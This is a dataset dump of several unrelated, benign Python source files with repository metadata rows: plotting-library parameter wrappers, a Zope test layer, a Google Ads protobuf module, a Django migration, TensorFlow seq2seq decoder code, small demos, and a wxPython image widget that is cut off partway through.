map_user_layer_thickness: int = 1,
map_coastline_colour: str = "black",
map_coastline_style: str = "solid",
map_coastline_thickness: int = 1,
# [GridPlotting]
map_grid_latitude_reference: float = 0,
map_grid_latitude_increment: float = 10.0,
map_grid_longitude_reference: float = 0,
map_grid_longitude_increment: float = 20.0,
map_grid_line_style: str = "solid",
map_grid_thickness: int = 1,
map_grid_colour: str = "black",
map_grid_frame: bool = False,
map_grid_frame_line_style: str = "solid",
map_grid_frame_thickness: int = 1,
map_grid_frame_colour: str = "black",
# [LabelPlotting]
map_label_font: str = "sansserif",
map_label_font_style: str = "normal",
map_label_colour: str = "black",
map_label_height: float = 0.25,
map_label_blanking: bool = True,
map_label_latitude_frequency: int = 1,
map_label_longitude_frequency: int = 1,
map_label_left: bool = True,
map_label_right: bool = True,
map_label_top: bool = True,
map_label_bottom: bool = True,
):
return macro.mcoast(**_given_args(inspect.currentframe()))
def mcont(
*,
# [Contour] This action controls the plotting of isolines, contour bands and grid points. It is used to plot gridded data, such as fields.
legend: bool = False,
contour: str = True,
contour_method: str = "automatic",
contour_interpolation_floor: float = -2147483647,
contour_interpolation_ceiling: float = 2147483647,
contour_automatic_setting: str = False,
contour_style_name: str = "",
contour_metadata_only: bool = False,
contour_hilo: str = False,
contour_grid_value_plot: str = False,
# [Akima474Method]
contour_akima_x_resolution: float = 1.5,
contour_akima_y_resolution: float = 1.5,
# [Akima760Method]
#contour_akima_x_resolution: float = 1.5,
#contour_akima_y_resolution: float = 1.5,
# [AutomaticContourMethod]
# [CountSelectionType]
contour_max_level: float = 1e+21,
contour_min_level: float = -1e+21,
contour_shade_max_level: float = 1e+21,
contour_shade_min_level: float = -1e+21,
contour_level_count: int = 10,
contour_level_tolerance: int = 2,
contour_reference_level: float = 0.0,
# [HighHiLo]
contour_hilo_type: str = "text",
contour_hilo_window_size: int = 3,
contour_hilo_max_value: float = 1e+21,
contour_hilo_min_value: float = -1e+21,
contour_hi_max_value: float = 1e+21,
contour_hi_min_value: float = -1e+21,
contour_lo_max_value: float = 1e+21,
contour_lo_min_value: float = -1e+21,
contour_hilo_marker: str = False,
# [IntervalSelectionType]
#contour_max_level: float = 1e+21,
#contour_min_level: float = -1e+21,
#contour_shade_max_level: float = 1e+21,
#contour_shade_min_level: float = -1e+21,
#contour_reference_level: float = 0.0,
contour_interval: float = 8.0,
# [IsoLabel]
contour_label_type: str = "number",
contour_label_text: str = "",
contour_label_height: float = 0.3,
contour_label_format: str = "(automatic)",
contour_label_blanking: bool = True,
contour_label_font: str = "sansserif",
contour_label_font_style: str = "normal",
contour_label_colour: str = "contour_line_colour",
contour_label_frequency: int = 2,
# [IsoShading]
contour_shade_technique: str = "polygon_shading",
#contour_shade_max_level: float = 1e+21,
#contour_shade_min_level: float = -1e+21,
contour_shade_colour_method: str = "calculate",
# [LevelListSelectionType]
#contour_max_level: float = 1e+21,
#contour_min_level: float = -1e+21,
#contour_shade_max_level: float = 1e+21,
#contour_shade_min_level: float = -1e+21,
contour_level_list: List[float] = [],
# [LowHiLo]
#contour_hilo_type: str = "text",
#contour_hilo_window_size: int = 3,
#contour_hilo_max_value: float = 1e+21,
#contour_hilo_min_value: float = -1e+21,
#contour_hi_max_value: float = 1e+21,
#contour_hi_min_value: float = -1e+21,
#contour_lo_max_value: float = 1e+21,
#contour_lo_min_value: float = -1e+21,
#contour_hilo_marker: str = False,
# [NoIsoPlot]
contour_line_style: str = "solid",
contour_line_thickness: int = 1,
contour_line_colour_rainbow: bool = False,
contour_line_colour: str = "blue",
contour_line_colour_rainbow_method: str = "calculate",
contour_line_colour_rainbow_max_level_colour: str = "blue",
contour_line_colour_rainbow_min_level_colour: str = "red",
contour_line_colour_rainbow_direction: str = "anti_clockwise",
contour_line_colour_rainbow_colour_list: List[str] = [],
contour_line_colour_rainbow_colour_list_policy: str = "lastone",
contour_line_thickness_rainbow_list: List[int] = [],
contour_line_thickness_rainbow_list_policy: str = "lastone",
contour_line_style_rainbow_list: List[str] = [],
contour_line_style_rainbow_list_policy: str = "lastone",
contour_highlight: bool = True,
contour_level_selection_type: str = "count",
contour_label: bool = True,
contour_shade: bool = False,
contour_legend_only: bool = False,
# [ValuePlot]
contour_grid_value_type: str = "normal",
contour_grid_value_plot_type: str = "value",
):
return macro.mcont(**_given_args(inspect.currentframe()))
def msymb(
*,
# [SymbolAdvancedTableMode]
symbol_advanced_table_selection_type: str = "count",
symbol_advanced_table_min_value: float = -1e+21,
symbol_advanced_table_max_value: float = 1e+21,
symbol_advanced_table_level_count: int = 10,
symbol_advanced_table_level_tolerance: int = 2,
symbol_advanced_table_interval: float = 8.0,
symbol_advanced_table_reference_level: float = 0.0,
symbol_advanced_table_level_list: List[float] = [],
symbol_advanced_table_colour_method: str = "calculate",
symbol_advanced_table_max_level_colour: str = "blue",
symbol_advanced_table_min_level_colour: str = "red",
symbol_advanced_table_colour_direction: str = "anti_clockwise",
symbol_advanced_table_colour_list: List[str] = [],
symbol_advanced_table_colour_list_policy: str = "lastone",
symbol_advanced_table_marker_list: List[int] = [],
symbol_advanced_table_marker_name_list: List[str] = [],
symbol_advanced_table_marker_list_policy: str = "lastone",
symbol_advanced_table_height_method: str = "list",
symbol_advanced_table_height_max_value: float = 0.2,
symbol_advanced_table_height_min_value: float = 0.1,
symbol_advanced_table_height_list: List[float] = [],
symbol_advanced_table_height_list_policy: str = "lastone",
symbol_advanced_table_text_list: List[str] = [],
symbol_advanced_table_text_list_policy: str = "cycle",
symbol_advanced_table_text_font: str = "sansserif",
symbol_advanced_table_text_font_size: float = 0.25,
symbol_advanced_table_text_font_style: str = "normal",
symbol_advanced_table_text_font_colour: str = "automatic",
symbol_advanced_table_text_display_type: str = "none",
symbol_advanced_table_outlayer_method: bool = "none",
symbol_advanced_table_outlayer_min_value: float = -1e+21,
symbol_advanced_table_outlayer_max_value: float = 1e+21,
# [SymbolIndividualMode]
legend_user_text: str = "",
symbol_colour: str = "blue",
symbol_height: float = 0.2,
symbol_marker_mode: str = "index",
symbol_marker_index: int = 1,
symbol_marker_name: str = "dot",
symbol_image_path: str = "",
symbol_image_format: str = "automatic",
symbol_image_width: float = -1.0,
symbol_image_height: float = -1.0,
symbol_text_list: List[str] = [],
symbol_text_position: str = "right",
symbol_text_font: str = "sansserif",
symbol_text_font_size: float = 0.25,
symbol_text_font_style: str = "normal",
symbol_text_font_colour: str = "automatic",
symbol_legend_height: float = -1.0,
# [SymbolPlotting] This action controls the plotting of meteorological and marker symbols. It is used to plot point data, such as observations.
legend: bool = False,
symbol_scaling_method: bool = False,
symbol_scaling_level_0_height: float = 0.1,
symbol_scaling_factor: float = 4.0,
symbol_type: str = "number",
symbol_table_mode: str = "OFF",
#symbol_marker_mode: str = "index",
symbol_format: str = "(automatic)",
symbol_text_blanking: bool = False,
symbol_outline: bool = False,
symbol_outline_colour: str = "black",
symbol_outline_thickness: int = 1,
symbol_outline_style: str = "solid",
symbol_connect_line: bool = False,
symbol_connect_automatic_line_colour: bool = True,
symbol_connect_line_colour: str = "black",
symbol_connect_line_thickness: int = 1,
symbol_connect_line_style: str = "solid",
symbol_legend_only: bool = False,
# [SymbolTableMode]
symbol_min_table: List[float] = [],
symbol_max_table: List[float] = [],
symbol_marker_table: List[int] = [],
symbol_name_table: List[str] = [],
symbol_colour_table: List[str] = [],
symbol_height_table: List[float] = [],
):
return macro.msymb(**_given_args(inspect.currentframe()))
| [
"[email protected]"
] | |
5ec23bfac0f13f11f9935fea8caf3b8b1e956401 | c4af67db4c523d20f2d55aef90ba77db1fb53c38 | /CMFCalendar/testing.py | 0918f04c86d1a5fb9cdbaaf7709a9ab261d013b7 | [] | no_license | dtgit/dtedu | e59b16612d7d9ea064026bf80a44657082ef45a3 | d787885fe7ed0de6f9e40e9b05d852a0e9d60677 | refs/heads/master | 2020-04-06T05:22:50.025074 | 2009-04-08T20:13:20 | 2009-04-08T20:13:20 | 171,351 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,008 | py | ##############################################################################
#
# Copyright (c) 2006 Zope Corporation and Contributors. All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
""" Unit test layers.
$Id: testing.py 73064 2007-03-08 14:03:20Z yuppie $
"""
from Testing import ZopeTestCase
ZopeTestCase.installProduct('ZCTextIndex', 1)
ZopeTestCase.installProduct('CMFCore', 1)
import transaction
from Products.Five import zcml
from Products.CMFCore.testing import FunctionalZCMLLayer
from Products.CMFDefault.factory import addConfiguredSite
class FunctionalLayer(FunctionalZCMLLayer):
@classmethod
def setUp(cls):
import Products.CMFCalendar
import Products.CMFDefault
import Products.CMFTopic
import Products.DCWorkflow
zcml.load_config('configure.zcml', Products.CMFCalendar)
zcml.load_config('configure.zcml', Products.CMFDefault)
zcml.load_config('configure.zcml', Products.CMFTopic)
zcml.load_config('configure.zcml', Products.DCWorkflow)
app = ZopeTestCase.app()
addConfiguredSite(app, 'site', 'Products.CMFDefault:default',
snapshot=False,
extension_ids=('Products.CMFCalendar:default',
'Products.CMFCalendar:skins_support'))
transaction.commit()
ZopeTestCase.close(app)
@classmethod
def tearDown(cls):
app = ZopeTestCase.app()
app._delObject('site')
transaction.commit()
ZopeTestCase.close(app)
| [
"[email protected]"
] | |
6485d44a97f1ed29a4fa36480a7c390436e0aa7f | 2b25aae9266437b657e748f3d6fea4db9e9d7f15 | /CMU/6lab/coroutines1.py | a44559612b62e023d62943e13b80f94a5246447f | [] | no_license | Zilby/Stuy-Stuff | b1c3bc23abf40092a8a7a80e406e7c412bd22ae0 | 5c5e375304952f62667d3b34b36f0056c1a8e753 | refs/heads/master | 2020-05-18T03:03:48.210196 | 2018-11-15T04:50:03 | 2018-11-15T04:50:03 | 24,191,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | s="The quick brown fox jumped over the lazy old dog."
def capitalize():
while True:
value=yield
print value.upper()
c=capitalize()
c.next()
for word in s.split():
c.send(word)
| [
"[email protected]"
] | |
0aefadcd0195f3d016d2f2e73d810a3fa481c9bf | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v3/proto/errors/keyword_plan_keyword_error_pb2.py | 72f053c63c315f0883e175fbdc4ef1c9f7dc2a89 | [
"Apache-2.0"
] | permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | true | 5,055 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v3/proto/errors/keyword_plan_keyword_error.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v3/proto/errors/keyword_plan_keyword_error.proto',
package='google.ads.googleads.v3.errors',
syntax='proto3',
serialized_options=_b('\n\"com.google.ads.googleads.v3.errorsB\034KeywordPlanKeywordErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v3/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V3.Errors\312\002\036Google\\Ads\\GoogleAds\\V3\\Errors\352\002\"Google::Ads::GoogleAds::V3::Errors'),
serialized_pb=_b('\nEgoogle/ads/googleads_v3/proto/errors/keyword_plan_keyword_error.proto\x12\x1egoogle.ads.googleads.v3.errors\x1a\x1cgoogle/api/annotations.proto\"\x82\x02\n\x1bKeywordPlanKeywordErrorEnum\"\xe2\x01\n\x17KeywordPlanKeywordError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x1e\n\x1aINVALID_KEYWORD_MATCH_TYPE\x10\x02\x12\x15\n\x11\x44UPLICATE_KEYWORD\x10\x03\x12\x19\n\x15KEYWORD_TEXT_TOO_LONG\x10\x04\x12\x1d\n\x19KEYWORD_HAS_INVALID_CHARS\x10\x05\x12\x1e\n\x1aKEYWORD_HAS_TOO_MANY_WORDS\x10\x06\x12\x18\n\x14INVALID_KEYWORD_TEXT\x10\x07\x42\xf7\x01\n\"com.google.ads.googleads.v3.errorsB\x1cKeywordPlanKeywordErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v3/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V3.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V3\\Errors\xea\x02\"Google::Ads::GoogleAds::V3::Errorsb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR = _descriptor.EnumDescriptor(
name='KeywordPlanKeywordError',
full_name='google.ads.googleads.v3.errors.KeywordPlanKeywordErrorEnum.KeywordPlanKeywordError',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_KEYWORD_MATCH_TYPE', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DUPLICATE_KEYWORD', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEYWORD_TEXT_TOO_LONG', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEYWORD_HAS_INVALID_CHARS', index=5, number=5,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KEYWORD_HAS_TOO_MANY_WORDS', index=6, number=6,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_KEYWORD_TEXT', index=7, number=7,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=168,
serialized_end=394,
)
_sym_db.RegisterEnumDescriptor(_KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR)
_KEYWORDPLANKEYWORDERRORENUM = _descriptor.Descriptor(
name='KeywordPlanKeywordErrorEnum',
full_name='google.ads.googleads.v3.errors.KeywordPlanKeywordErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=136,
serialized_end=394,
)
_KEYWORDPLANKEYWORDERRORENUM_KEYWORDPLANKEYWORDERROR.containing_type = _KEYWORDPLANKEYWORDERRORENUM
DESCRIPTOR.message_types_by_name['KeywordPlanKeywordErrorEnum'] = _KEYWORDPLANKEYWORDERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
KeywordPlanKeywordErrorEnum = _reflection.GeneratedProtocolMessageType('KeywordPlanKeywordErrorEnum', (_message.Message,), dict(
DESCRIPTOR = _KEYWORDPLANKEYWORDERRORENUM,
__module__ = 'google.ads.googleads_v3.proto.errors.keyword_plan_keyword_error_pb2'
,
__doc__ = """Container for enum describing possible errors from applying a keyword or
a negative keyword from a keyword plan.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v3.errors.KeywordPlanKeywordErrorEnum)
))
_sym_db.RegisterMessage(KeywordPlanKeywordErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
f69a5854f33bc30eb43daf851f9e43ceb207ec1a | b7948d60834c4c6fe58d8d665177511cb6db53e2 | /Outpass Webapp + Api's - Django/student/migrations/0008_auto_20190815_0023.py | 08405388f8bb2400e3756da54e002813b1d1e8b2 | [] | no_license | abhinavsharma629/Outpass-Generator | 4a2ebc2c7d0fc678b2afd10a36c6cbcbc6583d60 | f363d49c47543c70e2c114ab7d48ffaef83b5de4 | refs/heads/master | 2022-02-24T15:07:58.171462 | 2019-10-05T16:05:09 | 2019-10-05T16:05:09 | 205,933,273 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,289 | py | # Generated by Django 2.2.4 on 2019-08-14 18:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('student', '0007_registeredcolleges_logo'),
]
operations = [
migrations.AlterField(
model_name='student',
name='bed_no',
field=models.PositiveIntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='student',
name='branch',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='student',
name='er_no',
field=models.CharField(blank=True, max_length=7, null=True),
),
migrations.AlterField(
model_name='student',
name='hostel',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='student',
name='room_no',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='student',
name='year',
field=models.PositiveIntegerField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
5a5e091b0cb0991756eaa7e0c7fdb809951c7cd4 | d158e396e083ad6761a1871bd39519d588c461bc | /hw/9dcv/contrib_seq2seq.py | e2a412f09abce6ff8f5b388720e649b2947d8530 | [] | no_license | jendelel/npfl114 | c7250e6256f556c2e9f134dce2f2148117c43368 | 44a562e2aae96a9e30f930cfae7985043f172828 | refs/heads/master | 2021-01-10T18:07:46.310969 | 2017-01-16T15:10:04 | 2017-01-16T15:10:04 | 71,621,825 | 1 | 2 | null | 2017-01-05T09:59:18 | 2016-10-22T06:42:31 | Python | UTF-8 | Python | false | false | 9,159 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Seq2seq layer operations for use in neural networks.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope as vs
# decoder_fn(time, cell_state, cell_input, cell_output, context_state)
# -> (done, next_state, next_input, emit_output, next_context_state
def dynamic_rnn_decoder(cell, decoder_fn, inputs=None, sequence_length=None,
parallel_iterations=None, swap_memory=False,
time_major=False, scope=None, name=None):
""" Dynamic RNN decoder for a sequence-to-sequence model specified by
RNNCell and decoder function.
The `dynamic_rnn_decoder` is similar to the `tf.python.ops.rnn.dynamic_rnn`
as the decoder does not make any assumptions of sequence length and batch
size of the input.
The `dynamic_rnn_decoder` has two modes: training or inference and expects
the user to create seperate functions for each.
Under both training and inference `cell` and `decoder_fn` is expected. Where
the `cell` performs computation at every timestep using the `raw_rnn` and
the `decoder_fn` allows modelling of early stopping, output, state, and next
input and context.
When training the user is expected to supply `inputs`. At every time step a
slice of the supplied input is fed to the `decoder_fn`, which modifies and
returns the input for the next time step.
`sequence_length` is needed at training time, i.e., when `inputs` is not
None, for dynamic unrolling. At test time, when `inputs` is None,
`sequence_length` is not needed.
Under inference `inputs` is expected to be `None` and the input is inferred
solely from the `decoder_fn`.
Args:
cell: An instance of RNNCell.
decoder_fn: A function that takes time, cell state, cell input,
cell output and context state. It returns a early stopping vector,
cell state, next input, cell output and context state.
Examples of decoder_fn can be found in the decoder_fn.py folder.
inputs: The inputs for decoding (embedded format).
If `time_major == False` (default), this must be a `Tensor` of shape:
`[batch_size, max_time, ...]`.
If `time_major == True`, this must be a `Tensor` of shape:
`[max_time, batch_size, ...]`.
The input to `cell` at each time step will be a `Tensor` with dimensions
`[batch_size, ...]`.
sequence_length: (optional) An int32/int64 vector sized `[batch_size]`.
if `inputs` is not None and `sequence_length` is None it is inferred
from the `inputs` as the maximal possible sequence length.
parallel_iterations: (Default: 32). The number of iterations to run in
parallel. Those operations which do not have any temporal dependency
and can be run in parallel, will be. This parameter trades off
time for space. Values >> 1 use more memory but take less time,
while smaller values use less memory but computations take longer.
swap_memory: Transparently swap the tensors produced in forward inference
but needed for back prop from GPU to CPU. This allows training RNNs
which would typically not fit on a single GPU, with very minimal (or no)
performance penalty.
time_major: The shape format of the `inputs` and `outputs` Tensors.
If true, these `Tensors` must be shaped `[max_time, batch_size, depth]`.
If false, these `Tensors` must be shaped `[batch_size, max_time, depth]`.
Using `time_major = True` is a bit more efficient because it avoids
transposes at the beginning and end of the RNN calculation. However,
most TensorFlow data is batch-major, so by default this function
accepts input and emits output in batch-major form.
scope: VariableScope for the `raw_rnn`;
defaults to None.
name: NameScope for the decoder;
defaults to "dynamic_rnn_decoder"
Returns:
A pair (outputs, state) where:
outputs: the RNN output 'Tensor'.
If time_major == False (default), this will be a `Tensor` shaped:
`[batch_size, max_time, cell.output_size]`.
If time_major == True, this will be a `Tensor` shaped:
`[max_time, batch_size, cell.output_size]`.
state: The final state and will be shaped
`[batch_size, cell.state_size]`.
Raises:
ValueError: if inputs is not None and has less than three dimensions.
"""
with ops.name_scope(name, "dynamic_rnn_decoder",
[cell, decoder_fn, inputs, sequence_length,
parallel_iterations, swap_memory, time_major, scope]):
if inputs is not None:
# Convert to tensor
inputs = ops.convert_to_tensor(inputs)
# Test input dimensions
if inputs.get_shape().ndims is not None and (
inputs.get_shape().ndims < 2):
raise ValueError("Inputs must have at least two dimensions")
# Setup of RNN (dimensions, sizes, length, initial state, dtype)
if not time_major:
# [batch, seq, features] -> [seq, batch, features]
inputs = array_ops.transpose(inputs, perm=[1, 0, 2])
dtype = inputs.dtype
# Get data input information
input_depth = int(inputs.get_shape()[2])
batch_depth = inputs.get_shape()[1].value
max_time = inputs.get_shape()[0].value
if max_time is None:
max_time = array_ops.shape(inputs)[0]
# Setup decoder inputs as TensorArray
inputs_ta = tensor_array_ops.TensorArray(dtype, size=max_time)
inputs_ta = inputs_ta.unpack(inputs)
def loop_fn(time, cell_output, cell_state, loop_state):
if cell_state is None: # first call, before while loop (in raw_rnn)
if cell_output is not None:
raise ValueError("Expected cell_output to be None when cell_state "
"is None, but saw: %s" % cell_output)
if loop_state is not None:
raise ValueError("Expected loop_state to be None when cell_state "
"is None, but saw: %s" % loop_state)
context_state = None
else: # subsequent calls, inside while loop, after cell excution
if isinstance(loop_state, tuple):
(done, context_state) = loop_state
else:
done = loop_state
context_state = None
# call decoder function
if inputs is not None: # training
# get next_cell_input
if cell_state is None:
next_cell_input = inputs_ta.read(0)
else:
if batch_depth is not None:
batch_size = batch_depth
else:
batch_size = array_ops.shape(done)[0]
next_cell_input = control_flow_ops.cond(
math_ops.equal(time, max_time),
lambda: array_ops.zeros([batch_size, input_depth], dtype=dtype),
lambda: inputs_ta.read(time))
(next_done, next_cell_state, next_cell_input, emit_output,
next_context_state) = decoder_fn(time, cell_state, next_cell_input,
cell_output, context_state)
else: # inference
# next_cell_input is obtained through decoder_fn
(next_done, next_cell_state, next_cell_input, emit_output,
next_context_state) = decoder_fn(time, cell_state, None, cell_output,
context_state)
# check if we are done
if next_done is None: # training
next_done = time >= sequence_length
# build next_loop_state
if next_context_state is None:
next_loop_state = next_done
else:
next_loop_state = (next_done, next_context_state)
return (next_done, next_cell_input, next_cell_state,
emit_output, next_loop_state)
# Run raw_rnn function
outputs_ta, state, _ = rnn.raw_rnn(
cell, loop_fn, parallel_iterations=parallel_iterations,
swap_memory=swap_memory, scope=scope)
outputs = outputs_ta.pack()
if not time_major:
# [seq, batch, features] -> [batch, seq, features]
outputs = array_ops.transpose(outputs, perm=[1, 0, 2])
return outputs, state
| [
"[email protected]"
] | |
7d5a0bdd30acb51aa2d53b292d0cadc6076e129e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03068/s875123408.py | 7ebd0a3af325dded24435da6029b158873c69c05 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 166 | py | n = int(input())
s = list(input())
k = int(input())
ans = ''
for i in range(n):
if s[i] != s[k-1]:
s[i] = '*'
else:
continue
print(*s, sep='') | [
"[email protected]"
] | |
f3bb6fb019a485fe0bec264817b74915c0530643 | 7323b8039f47c0457ae90173c963549b7d1e6823 | /sandbox/src1/histdemo.py | a8514133c69af80b7c5f510d812d969b0da96add | [
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] | permissive | sniemi/SamPy | abce0fb941f011a3264a8d74c25b522d6732173d | e048756feca67197cf5f995afd7d75d8286e017b | refs/heads/master | 2020-05-27T18:04:27.156194 | 2018-12-13T21:19:55 | 2018-12-13T21:19:55 | 31,713,784 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 361 | py | from matplotlib import rcParams
from pylab import *
mu, sigma = 100, 15
x = mu + sigma*randn(10000)
# the histogram of the data
n, bins, patches = hist(x, 100, normed=1)
# add a 'best fit' line
y = normpdf(bins, mu, sigma)
l = plot(bins, y, 'r--', linewidth=2)
xlim(40, 160)
xlabel('Smarts')
ylabel('P')
title(r'$\rm{IQ:}\/ \mu=100,\/ \sigma=15$')
show()
| [
"[email protected]"
] | |
d8b1f7b564f9c8a9889d070590faa58b2928a4d8 | c6d22cf128819af1d48d02972bb9296a1687b9bb | /venv/Lib/site-packages/pyface/ui/wx/image_widget.py | 2e50ff64cb90378c94caab22abc79b27e902d0f7 | [
"BSD-3-Clause"
] | permissive | GenomePhD/Bio1-HIV | 92808a1e7e6339da6d07190ba3e1a2071f3e8428 | b5059e7f121e4abb6888893f91f95dd79aed9ca4 | refs/heads/master | 2022-10-28T21:55:42.998205 | 2018-04-16T18:52:32 | 2018-04-16T18:52:32 | 129,792,081 | 0 | 1 | null | 2022-10-05T18:36:22 | 2018-04-16T19:03:26 | Python | UTF-8 | Python | false | false | 7,447 | py | #------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" A clickable/draggable widget containing an image. """
# Major package imports.
import wx
# Enthought library imports.
from traits.api import Any, Bool, Event
# Local imports.
from .widget import Widget
class ImageWidget(Widget):
""" A clickable/draggable widget containing an image. """
#### 'ImageWidget' interface ##############################################
# The bitmap.
bitmap = Any
# Is the widget selected?
selected = Bool(False)
#### Events ####
# A key was pressed while the tree is in focus.
key_pressed = Event
# A node has been activated (ie. double-clicked).
node_activated = Event
# A drag operation was started on a node.
node_begin_drag = Event
# A (non-leaf) node has been collapsed.
node_collapsed = Event
# A (non-leaf) node has been expanded.
node_expanded = Event
# A left-click occurred on a node.
node_left_clicked = Event
# A right-click occurred on a node.
node_right_clicked = Event
#### Private interface ####################################################
_selected = Any
###########################################################################
# 'object' interface.
###########################################################################
def __init__ (self, parent, **traits):
""" Creates a new widget. """
# Base class constructors.
super(ImageWidget, self).__init__(**traits)
# Add some padding around the image.
size = (self.bitmap.GetWidth() + 10, self.bitmap.GetHeight() + 10)
# Create the toolkit-specific control.
self.control = wx.Window(parent, -1, size=size)
self.control.__tag__ = 'hack'
self._mouse_over = False
self._button_down = False
# Set up mouse event handlers:
self.control.Bind(wx.EVT_ENTER_WINDOW, self._on_enter_window)
self.control.Bind(wx.EVT_LEAVE_WINDOW, self._on_leave_window)
self.control.Bind(wx.EVT_LEFT_DCLICK, self._on_left_dclick)
self.control.Bind(wx.EVT_LEFT_DOWN, self._on_left_down)
self.control.Bind(wx.EVT_LEFT_UP, self._on_left_up)
self.control.Bind(wx.EVT_PAINT, self._on_paint)
# Pens used to draw the 'selection' marker:
# ZZZ: Make these class instances when moved to the wx toolkit code.
self._selectedPenDark = wx.Pen(
wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DSHADOW), 1,
wx.PENSTYLE_SOLID
)
self._selectedPenLight = wx.Pen(
wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DHIGHLIGHT), 1,
wx.PENSTYLE_SOLID
)
return
###########################################################################
# Private interface.
###########################################################################
#### Trait event handlers #################################################
def _bitmap_changed(self, bitmap):
""" Called when the widget's bitmap is changed. """
if self.control is not None:
self.control.Refresh()
return
def _selected_changed(self, selected):
